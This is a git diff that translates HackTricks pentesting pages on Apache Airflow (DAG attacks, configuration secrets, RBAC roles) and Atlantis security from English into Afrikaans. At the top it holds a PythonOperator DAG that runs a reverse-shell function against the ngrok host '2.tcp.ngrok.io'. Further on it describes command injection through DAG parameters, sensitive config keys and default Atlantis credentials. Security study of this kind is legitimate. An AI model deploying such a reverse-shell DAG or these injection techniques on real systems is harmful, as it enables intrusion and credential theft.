+start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
 ) as dag:
-    run = PythonOperator(
-        task_id='rs_python2',
-        python_callable=rs,
-        op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
+run = PythonOperator(
+task_id='rs_python2',
+python_callable=rs,
+op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
 ```
+#### DAG Skepping
 
-#### DAG Creation
+As jy daarin slaag om 'n **masjien binne die DAG-kluster te kompromitteer**, kan jy nuwe **DAG-skripte** in die `dags/` gids skep en hulle sal **in die res van die masjiene** binne die DAG-kluster **gekopieer word**.
 
-If you manage to **compromise a machine inside the DAG cluster**, you can create new **DAGs scripts** in the `dags/` folder and they will be **replicated in the rest of the machines** inside the DAG cluster.
+#### DAG Kode Inspuiting
 
-#### DAG Code Injection
+Wanneer jy 'n DAG vanaf die GUI uitvoer, kan jy **argumente** aan dit **oorgee**.\
+Daarom, as die DAG nie behoorlik gekodeer is nie, kan dit **kwulnerabel wees vir Opdrag Inspuiting.**\
+Dit is wat in hierdie CVE gebeur het: [https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927)
 
-When you execute a DAG from the GUI you can **pass arguments** to it.\
-Therefore, if the DAG is not properly coded it could be **vulnerable to Command Injection.**\
-That is what happened in this CVE: [https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927)
-
-All you need to know to **start looking for command injections in DAGs** is that **parameters** are **accessed** with the code **`dag_run.conf.get("param_name")`**.
-
-Moreover, the same vulnerability might occur with **variables** (note that with enough privileges you could **control the value of the variables** in the GUI). Variables are **accessed with**:
+Alles wat jy moet weet om **te begin soek na opdrag inspuitings in DAGs** is dat **parameters** met die kode **`dag_run.conf.get("param_name")`** **toegang verkry**.
 
+Boonop kan dieselfde kwesbaarheid voorkom met **veranderlikes** (let daarop dat jy met genoeg voorregte die **waarde van die veranderlikes** in die GUI kan **beheer**). Veranderlikes word **toegang verkry met**:
 ```python
 from airflow.models import Variable
 [...]
 foo = Variable.get("foo")
 ```
-
-If they are used for example inside a a bash command, you could perform a command injection.
+As hulle byvoorbeeld binne 'n bash-opdrag gebruik word, kan jy 'n opdraginjeksie uitvoer.
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md b/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md
index 5fd8e486b..3fd2d9461 100644
--- a/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md
+++ b/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md
@@ -1,115 +1,105 @@
-# Airflow Configuration
+# Airflow Konfigurasie
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Configuration File
+## Konfigurasie Lêer
 
-**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.**
+**Apache Airflow** genereer 'n **konfigurasie lêer** in al die airflow masjiene genaamd **`airflow.cfg`** in die huis van die airflow gebruiker. Hierdie konfigurasie lêer bevat konfigurasie-inligting en **kan interessante en sensitiewe inligting bevat.**
 
-**There are two ways to access this file: By compromising some airflow machine, or accessing the web console.**
+**Daar is twee maniere om toegang tot hierdie lêer te verkry: Deur 'n paar airflow masjiene te kompromitteer, of deur toegang tot die webkonsol.**
 
-Note that the **values inside the config file** **might not be the ones used**, as you can overwrite them setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`.
+Let daarop dat die **waardes binne die konfigurasie lêer** **nie diegene mag wees wat gebruik word nie**, aangesien jy dit kan oorskryf deur omgewingsveranderlikes soos `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'` in te stel.
 
-If you have access to the **config file in the web server**, you can check the **real running configuration** in the same page the config is displayed.\
-If you have **access to some machine inside the airflow env**, check the **environment**.
+As jy toegang het tot die **konfigurasie lêer in die webbediener**, kan jy die **werklike lopende konfigurasie** op dieselfde bladsy waar die konfigurasie vertoon word, nagaan.\
+As jy **toegang het tot 'n paar masjiene binne die airflow omgewing**, kyk na die **omgewing**.
 
-Some interesting values to check when reading the config file:
+Sommige interessante waardes om na te kyk wanneer jy die konfigurasie lêer lees:
 
 ### \[api]
 
-- **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS**
-- **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS**
-- **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS**
-- **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access to the API:
-  - `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API
-  - `airflow.api.auth.backend.default`: **Everyone can** access it without authentication
-  - `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication**
-  - `airflow.api.auth.backend.basic_auth`: For **basic authentication**
-  - `airflow.composer.api.backend.composer_auth`: Uses composers authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)).
-    - `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default).
-  - You can also **create you own authentication** method with python.
-- **`google_key_path`:** Path to the **GCP service account key**
+- **`access_control_allow_headers`**: Dit dui die **toegelate** **koppe** vir **CORS** aan
+- **`access_control_allow_methods`**: Dit dui die **toegelate metodes** vir **CORS** aan
+- **`access_control_allow_origins`**: Dit dui die **toegelate oorspronge** vir **CORS** aan
+- **`auth_backend`**: [**Volgens die dokumentasie**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) kan 'n paar opsies in plek wees om te konfigureer wie toegang tot die API kan hê:
+- `airflow.api.auth.backend.deny_all`: **Standaard kan niemand** toegang tot die API hê nie
+- `airflow.api.auth.backend.default`: **Enigiemand kan** toegang hê sonder verifikasie
+- `airflow.api.auth.backend.kerberos_auth`: Om **kerberos-verifikasie** te konfigureer
+- `airflow.api.auth.backend.basic_auth`: Vir **basiese verifikasie**
+- `airflow.composer.api.backend.composer_auth`: Gebruik komponiste se verifikasie (GCP) (van [**hier**](https://cloud.google.com/composer/docs/access-airflow-api)).
+- `composer_auth_user_registration_role`: Dit dui die **rol** aan wat die **komponiste gebruiker** binne **airflow** sal kry (**Op** standaard).
+- Jy kan ook jou eie **verifikasie** metode met python skep.
+- **`google_key_path`:** Pad na die **GCP diensrekening sleutel**
 
 ### **\[atlas]**
 
-- **`password`**: Atlas password
-- **`username`**: Atlas username
+- **`password`**: Atlas wagwoord
+- **`username`**: Atlas gebruikersnaam
 
 ### \[celery]
 
-- **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_)
-- **`result_backend`**: Postgres url which may contain **credentials**.
-- **`ssl_cacert`**: Path to the cacert
-- **`ssl_cert`**: Path to the cert
-- **`ssl_key`**: Path to the key
+- **`flower_basic_auth`** : Kredensiale (_user1:password1,user2:password2_)
+- **`result_backend`**: Postgres url wat **kredensiale** kan bevat.
+- **`ssl_cacert`**: Pad na die cacert
+- **`ssl_cert`**: Pad na die sertifikaat
+- **`ssl_key`**: Pad na die sleutel
 
 ### \[core]
 
-- **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that don’t contain the strings `DAG` and `airflow`.
-- **`fernet_key`**: Key to store encrypted variables (symmetric)
-- **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections.
-- **`security`**: What security module to use (for example kerberos)
+- **`dag_discovery_safe_mode`**: Geaktiveer deur standaard. Wanneer DAGs ontdek word, ignoreer enige lêers wat nie die strings `DAG` en `airflow` bevat nie.
+- **`fernet_key`**: Sleutel om versleutelde veranderlikes te stoor (simmetries)
+- **`hide_sensitive_var_conn_fields`**: Geaktiveer deur standaard, verberg sensitiewe inligting van verbindings.
+- **`security`**: Watter sekuriteitsmodule om te gebruik (byvoorbeeld kerberos)
 
 ### \[dask]
 
-- **`tls_ca`**: Path to ca
-- **`tls_cert`**: Part to the cert
-- **`tls_key`**: Part to the tls key
+- **`tls_ca`**: Pad na ca
+- **`tls_cert`**: Pad na die sertifikaat
+- **`tls_key`**: Pad na die tls sleutel
 
 ### \[kerberos]
 
-- **`ccache`**: Path to ccache file
-- **`forwardable`**: Enabled by default
+- **`ccache`**: Pad na ccache lêer
+- **`forwardable`**: Geaktiveer deur standaard
 
 ### \[logging]
 
-- **`google_key_path`**: Path to GCP JSON creds.
+- **`google_key_path`**: Pad na GCP JSON kredensiale.
 
 ### \[secrets]
 
-- **`backend`**: Full class name of secrets backend to enable
-- **`backend_kwargs`**: The backend_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class.
+- **`backend`**: Volledige klasnaam van die secrets backend om te aktiveer
+- **`backend_kwargs`**: Die backend_kwargs parameter word in 'n woordeboek gelaai en aan **init** van die secrets backend klas oorgedra.
 
 ### \[smtp]
 
-- **`smtp_password`**: SMTP password
-- **`smtp_user`**: SMTP user
+- **`smtp_password`**: SMTP wagwoord
+- **`smtp_user`**: SMTP gebruiker
 
 ### \[webserver]
 
-- **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value
-- **`cookie_secure`**: Set **secure flag** on the the session cookie
-- **`expose_config`**: By default is False, if true, the **config** can be **read** from the web **console**
-- **`expose_stacktrace`**: By default it's True, it will show **python tracebacks** (potentially useful for an attacker)
-- **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**)
-- **`web_server_ssl_cert`**: **Path** to the **SSL** **cert**
-- **`web_server_ssl_key`**: **Path** to the **SSL** **Key**
-- **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible
+- **`cookie_samesite`**: Standaard is dit **Lax**, so dit is reeds die swakste moontlike waarde
+- **`cookie_secure`**: Stel **veilige vlag** op die sessie koekie
+- **`expose_config`**: Standaard is dit Vals, as waar, kan die **konfigurasie** **gelees** word vanaf die web **konsol**
+- **`expose_stacktrace`**: Standaard is dit Waar, dit sal **python tracebacks** vertoon (potensieel nuttig vir 'n aanvaller)
+- **`secret_key`**: Dit is die **sleutel wat deur flask gebruik word om die koekies te teken** (as jy dit het, kan jy **enige gebruiker in Airflow naboots**)
+- **`web_server_ssl_cert`**: **Pad** na die **SSL** **sertifikaat**
+- **`web_server_ssl_key`**: **Pad** na die **SSL** **Sleutel**
+- **`x_frame_enabled`**: Standaard is **Waar**, so klikjacking is nie moontlik nie
 
-### Web Authentication
-
-By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as
+### Web Verifikasie
 
+Standaard word **web verifikasie** in die lêer **`webserver_config.py`** gespesifiseer en is geconfigureer as
 ```bash
 AUTH_TYPE = AUTH_DB
 ```
-
-Which means that the **authentication is checked against the database**. However, other configurations are possible like
-
+Wat beteken dat die **authentisering teen die databasis nagegaan word**. egter, ander konfigurasies is moontlik soos
 ```bash
 AUTH_TYPE = AUTH_OAUTH
 ```
+Om die **verifikasie aan derdeparty-dienste** oor te laat.
 
-To leave the **authentication to third party services**.
-
-However, there is also an option to a**llow anonymous users access**, setting the following parameter to the **desired role**:
-
+Daar is egter ook 'n opsie om **anonieme gebruikers toegang** te gee, deur die volgende parameter op die **gewenste rol** in te stel:
 ```bash
 AUTH_ROLE_PUBLIC = 'Admin'
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md b/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md
index 7ff782327..764af5a2f 100644
--- a/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md
+++ b/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md
@@ -4,44 +4,40 @@
 
 ## RBAC
 
-(From the docs)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles.
+(From the docs)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow verskaf 'n **stel rolle standaard**: **Admin**, **User**, **Op**, **Viewer**, en **Public**. **Slegs `Admin`** gebruikers kan **die toestemmings vir ander rolle konfigureer/wysig**. Maar dit word nie aanbeveel dat `Admin` gebruikers hierdie standaard rolle op enige manier verander deur toestemmings van hierdie rolle te verwyder of by te voeg nie.
 
-- **`Admin`** users have all possible permissions.
-- **`Public`** users (anonymous) don’t have any permissions.
-- **`Viewer`** users have limited viewer permissions (only read). It **cannot see the config.**
-- **`User`** users have `Viewer` permissions plus additional user permissions that allows him to manage DAGs a bit. He **can see the config file**
-- **`Op`** users have `User` permissions plus additional op permissions.
+- **`Admin`** gebruikers het alle moontlike toestemmings.
+- **`Public`** gebruikers (anoniem) het geen toestemmings nie.
+- **`Viewer`** gebruikers het beperkte kyktoestemmings (slegs lees). Dit **kan nie die konfigurasie sien nie.**
+- **`User`** gebruikers het `Viewer` toestemmings plus addisionele gebruikers toestemmings wat hom toelaat om DAGs 'n bietjie te bestuur. Hy **kan die konfigurasie lêer sien.**
+- **`Op`** gebruikers het `User` toestemmings plus addisionele operasionele toestemmings.
 
-Note that **admin** users can **create more roles** with more **granular permissions**.
+Let daarop dat **admin** gebruikers kan **meer rolle skep** met meer **fynere toestemmings**.
 
-Also note that the only default role with **permission to list users and roles is Admin, not even Op** is going to be able to do that.
+Neem ook kennis dat die enigste standaard rol met **toestemming om gebruikers en rolle te lys is Admin, nie eens Op** sal dit kan doen nie.
 
 ### Default Permissions
 
-These are the default permissions per default role:
+Hierdie is die standaard toestemmings per standaard rol:
 
 - **Admin**
 
-\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on Roles, can read on Permissions, can delete on Roles, can edit on Roles, can create on Roles, can read on Users, can create on Users, can edit on Users, can delete on Users, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs, can read on Task Reschedules, menu access on Task Reschedules, can read on Triggers, menu access on Triggers, can read on Passwords, can edit on Passwords, menu access on List Users, menu access on Security, menu access on List Roles, can read on User Stats Chart, menu access on User's Statistics, menu access on Base Permissions, can read on View Menus, menu access on Views/Menus, can read on Permission Views, menu access on Permission on Views/Menus, can get on MenuApi, menu access on Providers, can create on XComs]
+\[kan verwyder op Connections, kan lees op Connections, kan wysig op Connections, kan skep op Connections, kan lees op DAGs, kan wysig op DAGs, kan verwyder op DAGs, kan lees op DAG Runs, kan lees op Task Instances, kan wysig op Task Instances, kan verwyder op DAG Runs, kan skep op DAG Runs, kan wysig op DAG Runs, kan lees op Audit Logs, kan lees op ImportError, kan verwyder op Pools, kan lees op Pools, kan wysig op Pools, kan skep op Pools, kan lees op Providers, kan verwyder op Variables, kan lees op Variables, kan wysig op Variables, kan skep op Variables, kan lees op XComs, kan lees op DAG Code, kan lees op Configurations, kan lees op Plugins, kan lees op Roles, kan lees op Permissions, kan verwyder op Roles, kan wysig op Roles, kan skep op Roles, kan lees op Users, kan skep op Users, kan wysig op Users, kan verwyder op Users, kan lees op DAG Dependencies, kan lees op Jobs, kan lees op My Password, kan wysig op My Password, kan lees op My Profile, kan wysig op My Profile, kan lees op SLA Misses, kan lees op Task Logs, kan lees op Website, menu toegang op Browse, menu toegang op DAG Dependencies, menu toegang op DAG Runs, menu toegang op Documentation, menu toegang op Docs, menu toegang op Jobs, menu toegang op Audit Logs, menu toegang op Plugins, menu toegang op SLA Misses, menu toegang op Task Instances, kan skep op Task Instances, kan verwyder op Task Instances, menu toegang op Admin, menu toegang op Configurations, menu toegang op Connections, menu toegang op Pools, menu toegang op Variables, menu toegang op XComs, kan verwyder op XComs, kan lees op Task Reschedules, menu toegang op Task Reschedules, kan lees op Triggers, menu toegang op Triggers, kan lees op Passwords, kan wysig op Passwords, menu toegang op List Users, menu toegang op Security, menu toegang op List Roles, kan lees op User Stats Chart, menu toegang op User's Statistics, menu toegang op Base Permissions, kan lees op View Menus, menu toegang op Views/Menus, kan lees op Permission Views, menu toegang op Permission on Views/Menus, kan kry op MenuApi, menu toegang op Providers, kan skep op XComs]
 
 - **Op**
 
-\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs]
+\[kan verwyder op Connections, kan lees op Connections, kan wysig op Connections, kan skep op Connections, kan lees op DAGs, kan wysig op DAGs, kan verwyder op DAGs, kan lees op DAG Runs, kan lees op Task Instances, kan wysig op Task Instances, kan verwyder op DAG Runs, kan skep op DAG Runs, kan wysig op DAG Runs, kan lees op Audit Logs, kan lees op ImportError, kan verwyder op Pools, kan lees op Pools, kan wysig op Pools, kan skep op Pools, kan lees op Providers, kan verwyder op Variables, kan lees op Variables, kan wysig op Variables, kan skep op Variables, kan lees op XComs, kan lees op DAG Code, kan lees op Configurations, kan lees op Plugins, kan lees op DAG Dependencies, kan lees op Jobs, kan lees op My Password, kan wysig op My Password, kan lees op My Profile, kan wysig op My Profile, kan lees op SLA Misses, kan lees op Task Logs, kan lees op Website, menu toegang op Browse, menu toegang op DAG Dependencies, menu toegang op DAG Runs, menu toegang op Documentation, menu toegang op Docs, menu toegang op Jobs, menu toegang op Audit Logs, menu toegang op Plugins, menu toegang op SLA Misses, menu toegang op Task Instances, kan skep op Task Instances, kan verwyder op Task Instances, menu toegang op Admin, menu toegang op Configurations, menu toegang op Connections, menu toegang op Pools, menu toegang op Variables, menu toegang op XComs, kan verwyder op XComs]
 
 - **User**
 
-\[can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances]
+\[kan lees op DAGs, kan wysig op DAGs, kan verwyder op DAGs, kan lees op DAG Runs, kan lees op Task Instances, kan wysig op Task Instances, kan verwyder op DAG Runs, kan skep op DAG Runs, kan wysig op DAG Runs, kan lees op Audit Logs, kan lees op ImportError, kan lees op XComs, kan lees op DAG Code, kan lees op Plugins, kan lees op DAG Dependencies, kan lees op Jobs, kan lees op My Password, kan wysig op My Password, kan lees op My Profile, kan wysig op My Profile, kan lees op SLA Misses, kan lees op Task Logs, kan lees op Website, menu toegang op Browse, menu toegang op DAG Dependencies, menu toegang op DAG Runs, menu toegang op Documentation, menu toegang op Docs, menu toegang op Jobs, menu toegang op Audit Logs, menu toegang op Plugins, menu toegang op SLA Misses, menu toegang op Task Instances, kan skep op Task Instances, kan verwyder op Task Instances]
 
 - **Viewer**
 
-\[can read on DAGs, can read on DAG Runs, can read on Task Instances, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances]
+\[kan lees op DAGs, kan lees op DAG Runs, kan lees op Task Instances, kan lees op Audit Logs, kan lees op ImportError, kan lees op XComs, kan lees op DAG Code, kan lees op Plugins, kan lees op DAG Dependencies, kan lees op Jobs, kan lees op My Password, kan wysig op My Password, kan lees op My Profile, kan wysig op My Profile, kan lees op SLA Misses, kan lees op Task Logs, kan lees op Website, menu toegang op Browse, menu toegang op DAG Dependencies, menu toegang op DAG Runs, menu toegang op Documentation, menu toegang op Docs, menu toegang op Jobs, menu toegang op Audit Logs, menu toegang op Plugins, menu toegang op SLA Misses, menu toegang op Task Instances]
 
 - **Public**
 
 \[]
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/atlantis-security.md b/src/pentesting-ci-cd/atlantis-security.md
index a4b35140f..21e116f82 100644
--- a/src/pentesting-ci-cd/atlantis-security.md
+++ b/src/pentesting-ci-cd/atlantis-security.md
@@ -4,109 +4,109 @@
 
 ### Basic Information
 
-Atlantis basically helps you to to run terraform from Pull Requests from your git server.
+Atlantis help jou basies om terraform vanaf Pull Requests van jou git bediener te laat loop.
 
 ![](<../images/image (161).png>)
 
 ### Local Lab
 
-1. Go to the **atlantis releases page** in [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) and **download** the one that suits you.
-2. Create a **personal token** (with repo access) of your **github** user
-3. Execute `./atlantis testdrive` and it will create a **demo repo** you can use to **talk to atlantis**
-   1. You can access the web page in 127.0.0.1:4141
+1. Gaan na die **atlantis releases page** in [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) en **aflaai** die een wat vir jou geskik is.
+2. Skep 'n **persoonlike token** (met repo toegang) van jou **github** gebruiker.
+3. Voer `./atlantis testdrive` uit en dit sal 'n **demo repo** skep wat jy kan gebruik om met **atlantis** te **praat**.
+1. Jy kan die webblad in 127.0.0.1:4141 toegang.
 
 ### Atlantis Access
 
 #### Git Server Credentials
 
-**Atlantis** support several git hosts such as **Github**, **Gitlab**, **Bitbucket** and **Azure DevOps**.\
-However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).\
-[**The docs**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) encourage to create a user in these platform specifically for Atlantis, but some people might use personal accounts.
+**Atlantis** ondersteun verskeie git gasheer soos **Github**, **Gitlab**, **Bitbucket** en **Azure DevOps**.\
+Echter, om toegang tot die repos in daardie platforms te verkry en aksies uit te voer, moet dit 'n paar **privileged access granted to them** hê (ten minste skryf regte).\
+[**Die docs**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) moedig aan om 'n gebruiker in hierdie platforms spesifiek vir Atlantis te skep, maar sommige mense mag persoonlike rekeninge gebruik.
 
 > [!WARNING]
-> In any case, from an attackers perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**.
+> In enige geval, vanuit 'n aanvaller se perspektief, gaan die **Atlantis rekening** een baie **interessante** **te kompromitteer** wees.
 
 #### Webhooks
 
-Atlantis uses optionally [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) to validate that the **webhooks** it receives from your Git host are **legitimate**.
+Atlantis gebruik opsioneel [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) om te verifieer dat die **webhooks** wat dit van jou Git gasheer ontvang **legitiem** is.
 
-One way to confirm this would be to **allowlist requests to only come from the IPs** of your Git host but an easier way is to use a Webhook Secret.
+Een manier om dit te bevestig, sou wees om **toestemming te gee dat versoeke slegs van die IP's** van jou Git gasheer kom, maar 'n makliker manier is om 'n Webhook Secret te gebruik.
 
-Note that unless you use a private github or bitbucket server, you will need to expose webhook endpoints to the Internet.
+Let daarop dat tensy jy 'n private github of bitbucket bediener gebruik, jy webhook eindpunte aan die internet moet blootstel.
 
 > [!WARNING]
-> Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attackers perspective it would be interesting to know **if you can send it messages**.
+> Atlantis gaan **webhooks blootstel** sodat die git bediener dit inligting kan stuur. Vanuit 'n aanvaller se perspektief sou dit interessant wees om te weet **of jy dit boodskappe kan stuur**.
 
 #### Provider Credentials <a href="#provider-credentials" id="provider-credentials"></a>
 
-[From the docs:](https://www.runatlantis.io/docs/provider-credentials.html)
+[Van die docs:](https://www.runatlantis.io/docs/provider-credentials.html)
 
-Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider.
+Atlantis loop Terraform deur eenvoudig **`terraform plan` en `apply`** op die bediener **waarop Atlantis gehoste is** uit te voer. Net soos wanneer jy Terraform plaaslik loop, benodig Atlantis credentials vir jou spesifieke verskaffer.
 
-It's up to you how you [provide credentials](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) for your specific provider to Atlantis:
+Dit is aan jou hoe jy [credentials verskaf](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) vir jou spesifieke verskaffer aan Atlantis:
 
-- The Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) and [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) have their own mechanisms for provider credentials. Read their docs.
-- If you're running Atlantis in a cloud then many clouds have ways to give cloud API access to applications running on them, ex:
-  - [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Search for "EC2 Role")
-  - [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference)
-- Many users set environment variables, ex. `AWS_ACCESS_KEY`, where Atlantis is running.
-- Others create the necessary config files, ex. `~/.aws/credentials`, where Atlantis is running.
-- Use the [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) to obtain provider credentials.
+- Die Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) en [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) het hul eie meganismes vir verskaffer credentials. Lees hul docs.
+- As jy Atlantis in 'n wolk loop, het baie wolke maniere om wolk API toegang aan toepassings wat daarop loop te gee, bv:
+- [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Soek vir "EC2 Role")
+- [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference)
+- Baie gebruikers stel omgewing veranderlikes in, bv. `AWS_ACCESS_KEY`, waar Atlantis loop.
+- Ander skep die nodige konfigurasie lêers, bv. `~/.aws/credentials`, waar Atlantis loop.
+- Gebruik die [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) om verskaffer credentials te verkry.
 
 > [!WARNING]
-> The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform.
+> Die **container** waar **Atlantis** **loop**, gaan hoogs waarskynlik **privileged credentials** vir die verskaffers (AWS, GCP, Github...) wat Atlantis via Terraform bestuur, bevat.
 
 #### Web Page
 
-By default Atlantis will run a **web page in the port 4141 in localhost**. This page just allows you to enable/disable atlantis apply and check the plan status of the repos and unlock them (it doesn't allow to modify things, so it isn't that useful).
+Standaard sal Atlantis 'n **webblad in die poort 4141 in localhost** laat loop. Hierdie bladsy laat jou net toe om atlantis apply in te skakel/af te skakel en die planstatus van die repos te kontroleer en hulle te ontgrendel (dit laat nie toe om dinge te wysig nie, so dit is nie so nuttig nie).
 
-You probably won't find it exposed to the internet, but it looks like by default **no credentials are needed** to access it (and if they are `atlantis`:`atlantis` are the **default** ones).
+Jy sal waarskynlik nie vind dat dit aan die internet blootgestel is nie, maar dit lyk asof standaard **geen credentials benodig** word om toegang te verkry nie (en as hulle is, is `atlantis`:`atlantis` die **standaard** een).
 
 ### Server Configuration
 
-Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three.
+Konfigurasie vir `atlantis server` kan gespesifiseer word via opdraglyn vlae, omgewing veranderlikes, 'n konfigurasie lêer of 'n mengsel van die drie.
 
-- You can find [**here the list of flags**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) supported by Atlantis server
-- You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables)
+- Jy kan [**hier die lys van vlae**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) wat deur Atlantis bediener ondersteun word, vind.
+- Jy kan [**hier vind hoe om 'n konfigurasie opsie in 'n omgewing veranderlike te transformeer**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables)
 
